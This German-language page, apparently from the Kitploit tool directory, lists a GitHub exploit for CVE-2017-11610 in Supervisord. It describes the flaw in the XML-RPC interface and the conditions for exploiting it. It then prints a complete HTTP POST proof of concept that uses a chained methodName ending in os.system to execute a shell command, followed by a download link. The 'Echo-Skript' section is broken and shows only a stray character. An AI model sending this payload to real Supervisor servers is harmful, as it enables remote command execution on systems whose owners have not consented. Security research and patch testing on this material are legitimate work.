Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2017-11610 — Supervisord-Skript für Remote-Befehlsausführungs-Schwachstelle | Kitploit
Tools/GitHubGitHub/yaunsky/cve-2017-11610
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlRemote-Access-Tool
GitHubyaunsky/cve-2017-11610

CVE-2017-11610

Supervisord-Skript für Remote-Befehlsausführungs-Schwachstelle

Repository anzeigen
42vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Supervisord Remote Command Execution Schwachstellen-Skript (CVE-2017-11610)

Schwachstellenbeschreibung

Supervisor ist ein in Python geschriebener Prozessmanagement-Tool, das es ermöglicht, auf UNIX-ähnlichen Systemen (Windows wird nicht unterstützt) Prozesse zu starten, neu zu starten (automatischer Neustart von Programmen) und zu beenden (nicht nur Python-Prozesse).

Supervisor folgt einem C/S-Modell: supervisord ist der Server-Teil, supervisorctl der Client. Vereinfacht gesagt, gibt der Client Supervisor-Befehle ein, die die API des Servers aufrufen, um bestimmte Aufgaben zu erledigen.

Das Web-Interface von Supervisor wird häufig genutzt – es ist im Grunde ein Client für supervisord. Solange die Route erreichbar ist, können über das Web-Interface ähnliche Aktionen wie über den supervisorctl-Client durchgeführt werden. Die Operationen über das Web-Interface werden über die XML-RPC-Schnittstelle realisiert, und die Schwachstelle liegt in der Datenverarbeitung dieser XML-RPC-Schnittstelle.

Ausnutzungsbedingungen

  • Supervisor Version 3.1.2 bis Supervisor Version 3.3.2
  • Der Webdienst ist aktiviert und Port 9001 ist erreichbar
  • Das Passwort ist schwach oder leer

POC

root@kitploit:~
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>

Dieser POC liefert keine Rückmeldung.

Echo-Skript

a

Tool herunterladen